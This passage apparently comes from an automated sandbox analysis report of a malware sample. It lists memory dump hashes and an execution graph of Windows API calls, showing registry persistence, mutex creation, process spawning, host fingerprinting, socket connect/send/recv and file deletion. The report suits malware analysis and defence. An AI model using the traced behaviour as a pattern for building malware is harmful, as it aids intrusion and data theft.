                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 587abeb460b23769bb14986b2ed3a565a68c493d02e4808998481c59c74d0d18
                                                                                            • Instruction ID: cc6d0b1b896e5afe7b5b33de16778524bc5e735f76d5350bbbc5c0a92ccde121
                                                                                            • Opcode Fuzzy Hash: 587abeb460b23769bb14986b2ed3a565a68c493d02e4808998481c59c74d0d18
                                                                                            • Instruction Fuzzy Hash: 6F01F771504344AAE7114F26EC88F67BBD8EF81B25F08C419EC184A242C279A841CEB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 32cee2b0027941fe40ada2f2b0edc259d9ec2395ebd2ff3fc40086b56d548d8f
                                                                                            • Instruction ID: e11ae4d2112b2a8dca840a5e21a2cd299df1cbce6a2b7ec4175685490cee2fb6
                                                                                            • Opcode Fuzzy Hash: 32cee2b0027941fe40ada2f2b0edc259d9ec2395ebd2ff3fc40086b56d548d8f
                                                                                            • Instruction Fuzzy Hash: D6F18432E04609DFDB11CFA8D9806AAB7B2FF44300F19C966D416E7241E335F9879B59
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: def92e06f109270f9579e4edaa413dea0a65d812f97752702322eb356e2fb543
                                                                                            • Instruction ID: f5623593e0bfb22d352cc13609568ba2be89c8c2d22062b1910f22f03564779b
                                                                                            • Opcode Fuzzy Hash: def92e06f109270f9579e4edaa413dea0a65d812f97752702322eb356e2fb543
                                                                                            • Instruction Fuzzy Hash: DF21E36600E7D55FC3079B68A9AA4D6BF74AE1365830E86C7C0C5CF1A79748484BC7A2

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.2%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:6.6%
                                                                                            Total number of Nodes:1129
                                                                                            Total number of Limit Nodes:51
                                                                                            execution_graph 46497 41d4d0 46499 41d4e6 ctype ___scrt_fastfail 46497->46499 46498 41d6e3 46503 41d734 46498->46503 46513 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46498->46513 46499->46498 46518 431f99 21 API calls ___crtLCMapStringA 46499->46518 46502 41d6f4 46502->46503 46504 41d760 46502->46504 46514 431f99 21 API calls ___crtLCMapStringA 46502->46514 46504->46503 46521 41d474 21 API calls ___scrt_fastfail 46504->46521 46506 41d696 ___scrt_fastfail 46506->46503 46519 431f99 21 API calls ___crtLCMapStringA 46506->46519 46509 41d72d ___scrt_fastfail 46509->46503 46515 43264f 46509->46515 46511 41d6be ___scrt_fastfail 46511->46503 46520 431f99 21 API calls ___crtLCMapStringA 46511->46520 46513->46502 46514->46509 46522 43256f 46515->46522 46517 432657 46517->46504 46518->46506 46519->46511 46520->46498 46521->46503 46523 43257e 46522->46523 46524 432588 46522->46524 46523->46517 46524->46523 46528 431f99 21 API calls ___crtLCMapStringA 46524->46528 46526 4325a9 46526->46523 46529 43293a CryptAcquireContextA 46526->46529 46528->46526 46530 43295b CryptGenRandom 46529->46530 46532 432956 46529->46532 46531 432970 CryptReleaseContext 46530->46531 46530->46532 46531->46532 46532->46523 46533 426030 46538 4260f7 recv 46533->46538 46539 44e8b6 46540 44e8c1 46539->46540 46541 44e8e9 46540->46541 46542 44e8da 46540->46542 46543 44e8f8 46541->46543 46561 455573 27 API calls 2 library calls 46541->46561 46560 445354 20 API calls __dosmaperr 46542->46560 46548 44b9be 46543->46548 46547 44e8df ___scrt_fastfail 46549 44b9d6 46548->46549 46550 44b9cb 46548->46550 46552 44b9de 46549->46552 46558 44b9e7 _strftime 46549->46558 46562 446aff 21 API calls 3 library calls 46550->46562 46563 446ac5 20 API calls _free 46552->46563 46554 44ba11 RtlReAllocateHeap 46556 44b9d3 46554->46556 46554->46558 46555 44b9ec 46564 445354 20 API calls __dosmaperr 46555->46564 46556->46547 46558->46554 46558->46555 46565 442200 7 API calls 2 library calls 46558->46565 46560->46547 46561->46543 46562->46556 46563->46556 46564->46556 46565->46558 46566 426091 46571 42610e send 46566->46571 46572 43a998 46575 43a9a4 _swprintf ___BuildCatchObject 46572->46575 46573 43a9b2 46590 445354 20 API calls __dosmaperr 46573->46590 46575->46573 46578 43a9dc 46575->46578 46576 43a9b7 46591 43a827 26 API calls _Deallocate 46576->46591 46585 444acc EnterCriticalSection 46578->46585 46580 43a9e7 46586 43aa88 46580->46586 46581 43a9c2 __wsopen_s 46585->46580 46588 43aa96 46586->46588 46587 43a9f2 46592 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46587->46592 46588->46587 46588->46588 46593 448416 39 API calls 2 library calls 46588->46593 46590->46576 46591->46581 46592->46581 46593->46588 46594 402bcc 46595 402bd7 46594->46595 46596 402bdf 46594->46596 46612 403315 28 API calls 2 library calls 46595->46612 46598 402beb 46596->46598 46602 4015d3 46596->46602 46599 402bdd 46604 43360d 46602->46604 46605 402be9 46604->46605 46608 43362e std::_Facet_Register 46604->46608 46613 43a88c 46604->46613 46620 442200 7 API calls 2 library calls 46604->46620 46607 433dec std::_Facet_Register 46622 437bd7 RaiseException 46607->46622 46608->46607 46621 437bd7 RaiseException 46608->46621 46610 433e09 46612->46599 46618 446aff _strftime 46613->46618 46614 446b3d 46624 445354 20 API calls __dosmaperr 46614->46624 46616 446b28 RtlAllocateHeap 46617 446b3b 46616->46617 46616->46618 46617->46604 46618->46614 46618->46616 46623 442200 7 API calls 2 library calls 46618->46623 46620->46604 46621->46607 46622->46610 46623->46618 46624->46617 46625 4339be 46626 4339ca ___BuildCatchObject 46625->46626 46657 4336b3 46626->46657 46628 4339d1 46629 433b24 46628->46629 46632 4339fb 46628->46632 46957 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46629->46957 46631 433b2b 46958 4426be 28 API calls _abort 46631->46958 46641 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46632->46641 46951 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46632->46951 46634 433b31 46959 442670 28 API calls _abort 46634->46959 46637 433a14 46639 433a1a 46637->46639 46952 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46637->46952 46638 433b39 46647 433a9b 46641->46647 46953 43edf4 38 API calls 3 library calls 46641->46953 46668 433c5e 46647->46668 46651 433abd 46651->46631 46652 433ac1 46651->46652 46653 433aca 46652->46653 46955 442661 28 API calls _abort 46652->46955 46956 433842 13 API calls 2 library calls 46653->46956 46656 433ad2 46656->46639 46658 4336bc 46657->46658 46960 433e0a IsProcessorFeaturePresent 46658->46960 46660 4336c8 46961 4379ee 10 API calls 3 library calls 46660->46961 46662 4336cd 46663 4336d1 46662->46663 46962 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46662->46962 46663->46628 46665 4336da 46666 4336e8 46665->46666 46963 437a17 8 API calls 3 library calls 46665->46963 46666->46628 46964 436050 46668->46964 46671 433aa1 46672 443422 46671->46672 46966 44ddc9 46672->46966 46674 44342b 46675 433aaa 46674->46675 46970 44e0d3 38 API calls 46674->46970 46677 40d767 46675->46677 46972 41bce3 LoadLibraryA GetProcAddress 46677->46972 46679 40d783 GetModuleFileNameW 46977 40e168 46679->46977 46681 40d79f 46992 401fbd 46681->46992 46684 401fbd 28 API calls 46685 40d7bd 46684->46685 46996 41afc3 46685->46996 46689 40d7cf 47021 401d8c 46689->47021 46691 40d7d8 46692 40d835 46691->46692 46693 40d7eb 46691->46693 47027 401d64 46692->47027 47278 40e986 111 API calls 46693->47278 46696 40d845 46699 401d64 28 API calls 46696->46699 46697 40d7fd 46698 401d64 28 API calls 46697->46698 46702 40d809 46698->46702 46700 40d864 46699->46700 47032 404cbf 46700->47032 47279 40e937 68 API calls 46702->47279 46703 40d873 47036 405ce6 46703->47036 46706 40d824 47280 40e155 68 API calls 46706->47280 46707 40d87f 47039 401eef 46707->47039 46710 40d88b 47043 401eea 46710->47043 46712 40d894 46714 401eea 26 API calls 46712->46714 46713 401eea 26 API calls 46715 40dc9f 46713->46715 46716 40d89d 46714->46716 46954 433c94 GetModuleHandleW 46715->46954 46717 401d64 28 API calls 46716->46717 46718 40d8a6 46717->46718 47047 401ebd 46718->47047 46720 40d8b1 46721 401d64 28 API calls 46720->46721 46722 40d8ca 46721->46722 46723 401d64 28 API calls 46722->46723 46725 40d8e5 46723->46725 46724 40d946 46727 401d64 28 API calls 46724->46727 46742 40e134 46724->46742 46725->46724 47281 4085b4 46725->47281 46732 40d95d 46727->46732 46728 40d912 46729 401eef 26 API calls 46728->46729 46730 40d91e 46729->46730 46733 401eea 26 API calls 46730->46733 46731 40d9a4 47051 40bed7 46731->47051 46732->46731 46738 4124b7 3 API calls 46732->46738 46734 40d927 46733->46734 47285 4124b7 RegOpenKeyExA 46734->47285 46736 40d9aa 46737 40d82d 46736->46737 47054 41a463 46736->47054 46737->46713 46743 40d988 46738->46743 46741 40d9c5 46744 40da18 46741->46744 47071 40697b 46741->47071 47361 412902 30 API calls 46742->47361 46743->46731 47288 412902 30 API calls 46743->47288 46746 401d64 28 API calls 46744->46746 46749 40da21 46746->46749 46758 40da32 46749->46758 46759 40da2d 46749->46759 46751 40e14a 47362 4112b5 64 API calls ___scrt_fastfail 46751->47362 46753 40d9e4 47289 40699d 30 API calls 46753->47289 46754 40d9ee 46756 401d64 28 API calls 46754->46756 46766 40d9f7 46756->46766 46763 401d64 28 API calls 46758->46763 47292 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46759->47292 46760 40d9e9 47290 4064d0 97 API calls 46760->47290 46764 40da3b 46763->46764 47075 41ae08 46764->47075 46766->46744 46769 40da13 46766->46769 46767 40da46 47079 401e18 46767->47079 47291 4064d0 97 API calls 46769->47291 46770 40da51 47083 401e13 46770->47083 46773 40da5a 46774 401d64 28 API calls 46773->46774 46775 40da63 46774->46775 46776 401d64 28 API calls 46775->46776 46777 40da7d 46776->46777 46778 401d64 28 API calls 46777->46778 46779 40da97 46778->46779 46780 401d64 28 API calls 46779->46780 46782 40dab0 46780->46782 46781 40db1d 46783 40db2c 46781->46783 46790 40dcaa ___scrt_fastfail 46781->46790 46782->46781 46784 401d64 28 API calls 46782->46784 46785 40db35 46783->46785 46813 40dbb1 ___scrt_fastfail 46783->46813 46788 40dac5 _wcslen 46784->46788 46786 401d64 28 API calls 46785->46786 46787 40db3e 46786->46787 46789 401d64 28 API calls 46787->46789 46788->46781 46791 401d64 28 API calls 46788->46791 46792 40db50 46789->46792 47352 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46790->47352 46793 40dae0 46791->46793 46795 401d64 28 API calls 46792->46795 46796 401d64 28 API calls 46793->46796 46797 40db62 46795->46797 46798 40daf5 46796->46798 46800 401d64 28 API calls 46797->46800 47293 40c89e 46798->47293 46799 40dcef 46801 401d64 28 API calls 46799->46801 46802 40db8b 46800->46802 46803 40dd16 46801->46803 46807 401d64 28 API calls 46802->46807 47097 401f66 46803->47097 46806 401e18 26 API calls 46809 40db14 46806->46809 46810 40db9c 46807->46810 46812 401e13 26 API calls 46809->46812 47350 40bc67 45 API calls _wcslen 46810->47350 46811 40dd25 47101 4126d2 RegCreateKeyA 46811->47101 46812->46781 47087 4128a2 46813->47087 46817 40dc45 ctype 46822 401d64 28 API calls 46817->46822 46818 40dbac 46818->46813 46820 401d64 28 API calls 46821 40dd47 46820->46821 47107 43a5e7 46821->47107 46823 40dc5c 46822->46823 46823->46799 46826 40dc70 46823->46826 46829 401d64 28 API calls 46826->46829 46827 40dd5e 47353 41beb0 86 API calls ___scrt_fastfail 46827->47353 46828 40dd81 46833 401f66 28 API calls 46828->46833 46831 40dc7e 46829->46831 46834 41ae08 28 API calls 46831->46834 46832 40dd65 CreateThread 46832->46828 47920 41c96f 10 API calls 46832->47920 46835 40dd96 46833->46835 46836 40dc87 46834->46836 46837 401f66 28 API calls 46835->46837 47351 40e219 109 API calls 46836->47351 46840 40dda5 46837->46840 46839 40dc8c 46839->46799 46842 40dc93 46839->46842 47111 41a686 46840->47111 46842->46737 46844 401d64 28 API calls 46845 40ddb6 46844->46845 46846 401d64 28 API calls 46845->46846 46847 40ddcb 46846->46847 46848 401d64 28 API calls 46847->46848 46849 40ddeb 46848->46849 46850 43a5e7 _strftime 42 API calls 46849->46850 46851 40ddf8 46850->46851 46852 401d64 28 API calls 46851->46852 46853 40de03 46852->46853 46854 401d64 28 API calls 46853->46854 46855 40de14 46854->46855 46856 401d64 28 API calls 46855->46856 46857 40de29 46856->46857 46858 401d64 28 API calls 46857->46858 46859 40de3a 46858->46859 46860 40de41 StrToIntA 46859->46860 47135 409517 46860->47135 46863 401d64 28 API calls 46864 40de5c 46863->46864 46865 40dea1 46864->46865 46866 40de68 46864->46866 46869 401d64 28 API calls 46865->46869 47354 43360d 22 API calls 3 library calls 46866->47354 46868 40de71 46871 401d64 28 API calls 46868->46871 46870 40deb1 46869->46870 46873 40def9 46870->46873 46874 40debd 46870->46874 46872 40de84 46871->46872 46875 40de8b CreateThread 46872->46875 46877 401d64 28 API calls 46873->46877 47355 43360d 22 API calls 3 library calls 46874->47355 46875->46865 47924 419128 102 API calls 2 library calls 46875->47924 46879 40df02 46877->46879 46878 40dec6 46880 401d64 28 API calls 46878->46880 46882 40df6c 46879->46882 46883 40df0e 46879->46883 46881 40ded8 46880->46881 46885 40dedf CreateThread 46881->46885 46886 401d64 28 API calls 46882->46886 46884 401d64 28 API calls 46883->46884 46888 40df1e 46884->46888 46885->46873 47923 419128 102 API calls 2 library calls 46885->47923 46887 40df75 46886->46887 46889 40df81 46887->46889 46890 40dfba 46887->46890 46891 401d64 28 API calls 46888->46891 46893 401d64 28 API calls 46889->46893 47160 41a7a2 GetComputerNameExW GetUserNameW 46890->47160 46894 40df33 46891->46894 46896 40df8a 46893->46896 47356 40c854 31 API calls 46894->47356 46901 401d64 28 API calls 46896->46901 46897 401e18 26 API calls 46898 40dfce 46897->46898 46900 401e13 26 API calls 46898->46900 46903 40dfd7 46900->46903 46904 40df9f 46901->46904 46902 40df46 46905 401e18 26 API calls 46902->46905 46906 40dfe0 SetProcessDEPPolicy 46903->46906 46907 40dfe3 CreateThread 46903->46907 46914 43a5e7 _strftime 42 API calls 46904->46914 46908 40df52 46905->46908 46906->46907 46909 40e004 46907->46909 46910 40dff8 CreateThread 46907->46910 47893 40e54f 46907->47893 46911 401e13 26 API calls 46908->46911 46912 40e019 46909->46912 46913 40e00d CreateThread 46909->46913 46910->46909 47925 410f36 136 API calls 46910->47925 46915 40df5b CreateThread 46911->46915 46917 40e073 46912->46917 46919 401f66 28 API calls 46912->46919 46913->46912 47921 411524 38 API calls ___scrt_fastfail 46913->47921 46916 40dfac 46914->46916 46915->46882 47922 40196b 49 API calls _strftime 46915->47922 47357 40b95c 7 API calls 46916->47357 47171 41246e RegOpenKeyExA 46917->47171 46920 40e046 46919->46920 47358 404c9e 28 API calls 46920->47358 46923 40e053 46925 401f66 28 API calls 46923->46925 46927 40e062 46925->46927 46926 40e12a 47183 40cbac 46926->47183 46931 41a686 79 API calls 46927->46931 46929 41ae08 28 API calls 46930 40e0a4 46929->46930 47174 412584 RegOpenKeyExW 46930->47174 46933 40e067 46931->46933 46935 401eea 26 API calls 46933->46935 46935->46917 46938 401e13 26 API calls 46941 40e0c5 46938->46941 46939 40e0ed DeleteFileW 46940 40e0f4 46939->46940 46939->46941 46943 41ae08 28 API calls 46940->46943 46941->46939 46941->46940 46942 40e0db Sleep 46941->46942 47359 401e07 46942->47359 46945 40e104 46943->46945 47179 41297a RegOpenKeyExW 46945->47179 46947 40e117 46948 401e13 26 API calls 46947->46948 46949 40e121 46948->46949 46950 401e13 26 API calls 46949->46950 46950->46926 46951->46637 46952->46641 46953->46647 46954->46651 46955->46653 46956->46656 46957->46631 46958->46634 46959->46638 46960->46660 46961->46662 46962->46665 46963->46663 46965 433c71 GetStartupInfoW 46964->46965 46965->46671 46967 44dddb 46966->46967 46968 44ddd2 46966->46968 46967->46674 46971 44dcc8 51 API calls 3 library calls 46968->46971 46970->46674 46971->46967 46973 41bd22 LoadLibraryA GetProcAddress 46972->46973 46974 41bd12 GetModuleHandleA GetProcAddress 46972->46974 46975 41bd4b 32 API calls 46973->46975 46976 41bd3b LoadLibraryA GetProcAddress 46973->46976 46974->46973 46975->46679 46976->46975 47363 41a63f FindResourceA 46977->47363 46980 43a88c ___crtLCMapStringA 21 API calls 46981 40e192 ctype 46980->46981 47366 401f86 46981->47366 46984 401eef 26 API calls 46985 40e1b8 46984->46985 46986 401eea 26 API calls 46985->46986 46987 40e1c1 46986->46987 46988 43a88c ___crtLCMapStringA 21 API calls 46987->46988 46989 40e1d2 ctype 46988->46989 47370 406052 46989->47370 46991 40e205 46991->46681 46993 401fcc 46992->46993 47378 402501 46993->47378 46995 401fea 46995->46684 47016 41afd6 46996->47016 46997 41b046 46998 401eea 26 API calls 46997->46998 46999 41b078 46998->46999 47000 401eea 26 API calls 46999->47000 47002 41b080 47000->47002 47001 41b048 47391 403b60 28 API calls 47001->47391 47005 401eea 26 API calls 47002->47005 47007 40d7c6 47005->47007 47006 41b054 47008 401eef 26 API calls 47006->47008 47017 40e8bd 47007->47017 47010 41b05d 47008->47010 47009 401eef 26 API calls 47009->47016 47011 401eea 26 API calls 47010->47011 47013 41b065 47011->47013 47012 401eea 26 API calls 47012->47016 47015 41bfa9 28 API calls 47013->47015 47015->46997 47016->46997 47016->47001 47016->47009 47016->47012 47383 403b60 28 API calls 47016->47383 47384 41bfa9 47016->47384 47018 40e8ca 47017->47018 47020 40e8da 47018->47020 47419 40200a 26 API calls 47018->47419 47020->46689 47022 40200a 47021->47022 47026 40203a 47022->47026 47420 402654 26 API calls 47022->47420 47024 40202b 47421 4026ba 26 API calls _Deallocate 47024->47421 47026->46691 47028 401d6c 47027->47028 47029 401d74 47028->47029 47422 401fff 28 API calls 47028->47422 47029->46696 47033 404ccb 47032->47033 47423 402e78 47033->47423 47035 404cee 47035->46703 47432 404bc4 47036->47432 47038 405cf4 47038->46707 47040 401efe 47039->47040 47042 401f0a 47040->47042 47441 4021b9 26 API calls 47040->47441 47042->46710 47044 4021b9 47043->47044 47045 4021e8 47044->47045 47442 40262e 26 API calls _Deallocate 47044->47442 47045->46712 47049 401ec9 47047->47049 47048 401ee4 47048->46720 47049->47048 47050 402325 28 API calls 47049->47050 47050->47048 47443 401e8f 47051->47443 47053 40bee1 CreateMutexA GetLastError 47053->46736 47445 41b15b 47054->47445 47059 401eef 26 API calls 47060 41a49f 47059->47060 47061 401eea 26 API calls 47060->47061 47062 41a4a7 47061->47062 47063 412513 31 API calls 47062->47063 47064 41a4fa 47062->47064 47065 41a4cd 47063->47065 47064->46741 47066 41a4d8 StrToIntA 47065->47066 47067 41a4ef 47066->47067 47068 41a4e6 47066->47068 47070 401eea 26 API calls 47067->47070 47453 41c102 28 API calls 47068->47453 47070->47064 47072 40698f 47071->47072 47073 4124b7 3 API calls 47072->47073 47074 406996 47073->47074 47074->46753 47074->46754 47076 41ae1c 47075->47076 47454 40b027 47076->47454 47078 41ae24 47078->46767 47080 401e27 47079->47080 47082 401e33 47080->47082 47463 402121 26 API calls 47080->47463 47082->46770 47085 402121 47083->47085 47084 402150 47084->46773 47085->47084 47464 402718 26 API calls _Deallocate 47085->47464 47088 4128c0 47087->47088 47089 406052 28 API calls 47088->47089 47090 4128d5 47089->47090 47091 401fbd 28 API calls 47090->47091 47092 4128e5 47091->47092 47093 4126d2 29 API calls 47092->47093 47094 4128ef 47093->47094 47095 401eea 26 API calls 47094->47095 47096 4128fc 47095->47096 47096->46817 47098 401f6e 47097->47098 47465 402301 47098->47465 47102 412722 47101->47102 47104 4126eb 47101->47104 47103 401eea 26 API calls 47102->47103 47105 40dd3b 47103->47105 47106 4126fd RegSetValueExA RegCloseKey 47104->47106 47105->46820 47106->47102 47108 43a600 _strftime 47107->47108 47469 43993e 47108->47469 47112 41a737 47111->47112 47113 41a69c GetLocalTime 47111->47113 47115 401eea 26 API calls 47112->47115 47114 404cbf 28 API calls 47113->47114 47116 41a6de 47114->47116 47117 41a73f 47115->47117 47118 405ce6 28 API calls 47116->47118 47119 401eea 26 API calls 47117->47119 47120 41a6ea 47118->47120 47121 40ddaa 47119->47121 47503 4027cb 47120->47503 47121->46844 47123 41a6f6 47124 405ce6 28 API calls 47123->47124 47125 41a702 47124->47125 47506 406478 76 API calls 47125->47506 47127 41a710 47128 401eea 26 API calls 47127->47128 47129 41a71c 47128->47129 47130 401eea 26 API calls 47129->47130 47131 41a725 47130->47131 47132 401eea 26 API calls 47131->47132 47133 41a72e 47132->47133 47134 401eea 26 API calls 47133->47134 47134->47112 47136 409536 _wcslen 47135->47136 47137 409541 47136->47137 47138 409558 47136->47138 47139 40c89e 31 API calls 47137->47139 47140 40c89e 31 API calls 47138->47140 47141 409549 47139->47141 47142 409560 47140->47142 47143 401e18 26 API calls 47141->47143 47144 401e18 26 API calls 47142->47144 47145 409553 47143->47145 47146 40956e 47144->47146 47148 401e13 26 API calls 47145->47148 47147 401e13 26 API calls 47146->47147 47149 409576 47147->47149 47150 4095ad 47148->47150 47526 40856b 28 API calls 47149->47526 47511 409837 47150->47511 47153 409588 47527 4028cf 47153->47527 47156 409593 47157 401e18 26 API calls 47156->47157 47158 40959d 47157->47158 47159 401e13 26 API calls 47158->47159 47159->47145 47692 403b40 47160->47692 47164 41a7fd 47165 4028cf 28 API calls 47164->47165 47166 41a807 47165->47166 47167 401e13 26 API calls 47166->47167 47168 41a810 47167->47168 47169 401e13 26 API calls 47168->47169 47170 40dfc3 47169->47170 47170->46897 47172 40e08b 47171->47172 47173 41248f RegQueryValueExA RegCloseKey 47171->47173 47172->46926 47172->46929 47173->47172 47175 4125b0 RegQueryValueExW RegCloseKey 47174->47175 47176 4125dd 47174->47176 47175->47176 47177 403b40 28 API calls 47176->47177 47178 40e0ba 47177->47178 47178->46938 47180 412992 RegDeleteValueW 47179->47180 47181 4129a6 47179->47181 47180->47181 47182 4129a2 47180->47182 47181->46947 47182->46947 47184 40cbc5 47183->47184 47185 41246e 3 API calls 47184->47185 47186 40cbcc 47185->47186 47187 40cbeb 47186->47187 47720 401602 47186->47720 47191 413fd4 47187->47191 47189 40cbd9 47723 4127d5 RegCreateKeyA 47189->47723 47192 413feb 47191->47192 47740 41aa73 47192->47740 47194 413ff6 47195 401d64 28 API calls 47194->47195 47196 41400f 47195->47196 47197 43a5e7 _strftime 42 API calls 47196->47197 47198 41401c 47197->47198 47199 414021 Sleep 47198->47199 47200 41402e 47198->47200 47199->47200 47201 401f66 28 API calls 47200->47201 47202 41403d 47201->47202 47203 401d64 28 API calls 47202->47203 47204 41404b 47203->47204 47205 401fbd 28 API calls 47204->47205 47206 414053 47205->47206 47207 41afc3 28 API calls 47206->47207 47208 41405b 47207->47208 47744 404262 WSAStartup 47208->47744 47210 414065 47211 401d64 28 API calls 47210->47211 47212 41406e 47211->47212 47213 401d64 28 API calls 47212->47213 47239 4140ed 47212->47239 47214 414087 47213->47214 47216 401d64 28 API calls 47214->47216 47215 401fbd 28 API calls 47215->47239 47217 414098 47216->47217 47219 401d64 28 API calls 47217->47219 47218 41afc3 28 API calls 47218->47239 47220 4140a9 47219->47220 47222 401d64 28 API calls 47220->47222 47221 401d64 28 API calls 47221->47239 47224 4140ba 47222->47224 47223 4085b4 28 API calls 47223->47239 47226 401d64 28 API calls 47224->47226 47225 401eef 26 API calls 47225->47239 47227 4140cb 47226->47227 47228 401d64 28 API calls 47227->47228 47229 4140dd 47228->47229 47846 404101 87 API calls 47229->47846 47231 401eea 26 API calls 47231->47239 47233 414244 WSAGetLastError 47847 41bc76 30 API calls 47233->47847 47239->47215 47239->47218 47239->47221 47239->47223 47239->47225 47239->47231 47239->47233 47240 41a686 79 API calls 47239->47240 47242 404cbf 28 API calls 47239->47242 47243 401d8c 26 API calls 47239->47243 47244 43a5e7 _strftime 42 API calls 47239->47244 47246 405ce6 28 API calls 47239->47246 47247 4027cb 28 API calls 47239->47247 47248 401f66 28 API calls 47239->47248 47250 4082dc 28 API calls 47239->47250 47253 412513 31 API calls 47239->47253 47277 41446f 47239->47277 47745 413f9a 47239->47745 47750 4041f1 47239->47750 47757 404915 47239->47757 47772 40428c connect 47239->47772 47832 4047eb WaitForSingleObject 47239->47832 47848 404c9e 28 API calls 47239->47848 47849 413683 50 API calls 47239->47849 47850 440c51 26 API calls 47239->47850 47851 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47239->47851 47240->47239 47242->47239 47243->47239 47245 414b80 Sleep 47244->47245 47245->47239 47246->47239 47247->47239 47248->47239 47250->47239 47253->47239 47254 403b40 28 API calls 47254->47277 47257 401d64 28 API calls 47258 4144ed GetTickCount 47257->47258 47854 41ad46 28 API calls 47258->47854 47261 41ad46 28 API calls 47261->47277 47264 41aec8 28 API calls 47264->47277 47266 40275c 28 API calls 47266->47277 47267 405ce6 28 API calls 47267->47277 47268 4027cb 28 API calls 47268->47277 47270 401eea 26 API calls 47270->47277 47271 401e13 26 API calls 47271->47277 47274 401f66 28 API calls 47274->47277 47275 41a686 79 API calls 47275->47277 47276 414b22 CreateThread 47276->47277 47886 419e89 101 API calls 47276->47886 47277->47239 47277->47254 47277->47257 47277->47261 47277->47264 47277->47266 47277->47267 47277->47268 47277->47270 47277->47271 47277->47274 47277->47275 47277->47276 47852 40cbf1 6 API calls 47277->47852 47853 41adee 28 API calls 47277->47853 47855 41aca0 GetTickCount 47277->47855 47856 41ac52 30 API calls ___scrt_fastfail 47277->47856 47857 40e679 29 API calls 47277->47857 47858 4027ec 28 API calls 47277->47858 47859 404468 59 API calls ctype 47277->47859 47860 4045d5 111 API calls ___crtLCMapStringA 47277->47860 47861 40a767 84 API calls 47277->47861 47278->46697 47279->46706 47282 4085c0 47281->47282 47283 402e78 28 API calls 47282->47283 47284 4085e4 47283->47284 47284->46728 47286 4124e1 RegQueryValueExA RegCloseKey 47285->47286 47287 41250b 47285->47287 47286->47287 47287->46724 47288->46731 47289->46760 47290->46754 47291->46744 47292->46758 47294 40c8ba 47293->47294 47295 40c8da 47294->47295 47296 40c90f 47294->47296 47298 40c8d0 47294->47298 47887 41a74b 29 API calls 47295->47887 47297 41b15b GetCurrentProcess 47296->47297 47301 40c914 47297->47301 47300 40ca03 GetLongPathNameW 47298->47300 47303 403b40 28 API calls 47300->47303 47304 40c918 47301->47304 47305 40c96a 47301->47305 47302 40c8e3 47306 401e18 26 API calls 47302->47306 47307 40ca18 47303->47307 47310 403b40 28 API calls 47304->47310 47309 403b40 28 API calls 47305->47309 47311 40c8ed 47306->47311 47308 403b40 28 API calls 47307->47308 47312 40ca27 47308->47312 47313 40c978 47309->47313 47314 40c926 47310->47314 47316 401e13 26 API calls 47311->47316 47890 40cc37 28 API calls 47312->47890 47319 403b40 28 API calls 47313->47319 47320 403b40 28 API calls 47314->47320 47316->47298 47317 40ca3a 47891 402860 28 API calls 47317->47891 47322 40c98e 47319->47322 47323 40c93c 47320->47323 47321 40ca45 47892 402860 28 API calls 47321->47892 47889 402860 28 API calls 47322->47889 47888 402860 28 API calls 47323->47888 47327 40ca4f 47330 401e13 26 API calls 47327->47330 47328 40c999 47331 401e18 26 API calls 47328->47331 47329 40c947 47332 401e18 26 API calls 47329->47332 47333 40ca59 47330->47333 47334 40c9a4 47331->47334 47335 40c952 47332->47335 47336 401e13 26 API calls 47333->47336 47337 401e13 26 API calls 47334->47337 47338 401e13 26 API calls 47335->47338 47339 40ca62 47336->47339 47340 40c9ad 47337->47340 47341 40c95b 47338->47341 47342 401e13 26 API calls 47339->47342 47343 401e13 26 API calls 47340->47343 47344 401e13 26 API calls 47341->47344 47345 40ca6b 47342->47345 47343->47311 47344->47311 47346 401e13 26 API calls 47345->47346 47347 40ca74 47346->47347 47348 401e13 26 API calls 47347->47348 47349 40ca7d 47348->47349 47349->46806 47350->46818 47351->46839 47352->46799 47353->46832 47354->46868 47355->46878 47356->46902 47357->46890 47358->46923 47360 401e0c 47359->47360 47361->46751 47364 40e183 47363->47364 47365 41a65c LoadResource LockResource SizeofResource 47363->47365 47364->46980 47365->47364 47367 401f8e 47366->47367 47373 402325 47367->47373 47369 401fa4 47369->46984 47371 401f86 28 API calls 47370->47371 47372 406066 47371->47372 47372->46991 47374 40232f 47373->47374 47376 40233a 47374->47376 47377 40294a 28 API calls 47374->47377 47376->47369 47377->47376 47379 40250d 47378->47379 47381 40252b 47379->47381 47382 40261a 28 API calls 47379->47382 47381->46995 47382->47381 47383->47016 47385 41bfae 47384->47385 47386 41bfcb 47385->47386 47388 41bfd2 47385->47388 47411 41bfe3 28 API calls 47386->47411 47392 41c552 47388->47392 47389 41bfd0 47389->47016 47391->47006 47393 41c55c __EH_prolog 47392->47393 47394 41c673 47393->47394 47395 41c595 47393->47395 47418 402649 28 API calls std::_Xinvalid_argument 47394->47418 47412 4026a7 28 API calls 47395->47412 47399 41c5a9 47413 41c536 28 API 